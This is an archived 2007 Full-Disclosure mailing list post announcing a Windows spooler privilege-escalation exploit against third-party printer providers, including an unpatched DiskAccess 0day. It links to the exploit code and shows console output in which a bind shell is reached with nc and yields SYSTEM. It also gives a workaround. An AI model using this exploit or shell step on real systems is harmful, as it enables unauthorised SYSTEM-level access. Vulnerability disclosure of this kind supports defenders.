| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 29 Jan 2007 11:42:35 +0100
From: "Andres Tarasco" <atarasco@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Universal printer provider exploit for Windows
We have developed a new exploit that should allow code execution as SYSTEM
with the following software:
- DiskAccess NFS Client (dapcnfsd.dll v0.6.4.0) - REPORTED & NOTFIXED
-0day!!!
- Citrix Metaframe - cpprov.dll - FIXED
- Novell (nwspool.dll - CVE-2006-5854 - untested. pls give feedback)
More information at :
http://www.514.es/2007/01/universal_exploit_for_vulnerab.html (spanish)
exploit code:
http://www.514.es/2007/01/29/Universal_printer_provider_exploit.zip
/*
Title: Universal exploit for vulnerable printer providers (spooler service).
Vulnerability: Insecure EnumPrintersW() calls
Author: Andres Tarasco Acuña - atarasco@....es
Website: http://www.514.es
This code should allow to gain SYSTEM privileges with the following
software:
blink !blink! blink!
- DiskAccess NFS Client (dapcnfsd.dll v0.6.4.0) - REPORTED & NOTFIXED
-0day!!!
- Citrix Metaframe - cpprov.dll - FIXED
- Novell (nwspool.dll - CVE-2006-5854 - untested)
- More undisclosed stuff =)
If this code crashes your spooler service (spoolsv.exe) check your
"vulnerable" printer providers at:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Providers
Workaround: Trust only default printer providers "Internet Print Provider"
and "LanMan Print Services" and delete the other ones.
And remember, if it doesnt work for you, tweak it yourself. Do not ask
D:\Programación\EnumPrinters\Exploits>testlpc.exe
[+] Citrix Presentation Server - EnumPrinterW() Universal exploit
[+] Exploit coded by Andres Tarasco - atarasco@....es
[+] Connecting to spooler LCP port \RPC Control\spoolss
[+] Trying to locate valid address (1 tries)
[+] Mapped memory. Client address: 0x003d0000
[+] Mapped memory. Server address: 0x00a70000
[+] Targeting return address to : 0x00A700A7
[+] Writting to shared memory...
[+] Written 0x1000 bytes
[+] Exploiting vulnerability....
[+] Exploit complete. Now Connect to 127.0.0.1:51477
D:\Programación\EnumPrinters>nc localhost 51477
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM
regards,
Andres Tarasco
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists